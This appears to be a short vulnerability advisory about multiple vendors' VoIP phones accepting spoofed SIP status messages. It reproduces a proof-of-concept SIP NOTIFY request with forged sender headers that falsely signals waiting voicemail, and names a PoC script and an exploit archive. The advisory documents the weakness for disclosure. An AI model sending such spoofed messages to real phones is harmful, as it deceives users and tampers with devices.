|
Multiple Vendor VoIP Phones Spoofed SIP Status Message Handling Weakness
An exploit is not required. The following proof of concept example is available: UDP-Message from Attacker to Victim Session Initiation Protocol Request-Line: NOTIFY sip:login@10.1.1.2 SIP/2.0 Message Header Via: SIP/2.0/UDP 15.1.1.12:5060;branch=000000000000000 From: "asterisk" <sip:asterisk@10.1.1.1>;tag=000000000 To: <sip:login@10.1.1.2> Contact: <sip:asterisk@10.1.1.1> Call-ID: 00000000000000@10.1.1.1 CSeq: 102 NOTIFY User-Agent: Asterisk PBX Event: message-summary Content-Type: application/simple-message-summary Content-Length: 37 Message body Messages-Waiting: yes\n Voicemail: 3/2\n A proof of concept (SIP_NOTIFY_POC.pl) has been supplied by <DrFrancky@securax.org>. Tobias Glemser <tglemser@tele-consulting.com> has provided an exploit (snf.zip) as well: |
|
|
Privacy Statement |
